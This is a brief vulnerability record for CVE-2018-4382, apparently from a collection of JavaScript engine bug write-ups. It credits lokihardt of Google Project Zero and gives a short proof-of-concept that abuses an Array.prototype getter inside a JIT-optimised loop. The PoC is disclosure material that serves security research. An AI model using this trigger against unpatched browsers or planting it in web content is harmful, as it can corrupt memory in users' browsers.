CVE-2018-4382.md

CVE-2018-4382

• Report: Nov 2018
• Fix: Nov 2018
• Credit: lokihardt, Google Project Zero

PoC

Array.prototype.__defineGetter__('a', Array.prototype.push);

function opt() {
    let arr = new Array(1, 2, 3, 4);
    arr['a' + ''];
}

for (let i = 0; i < 1000; i++) {
    opt();
}

Reference

• Apple
• Google Project Zero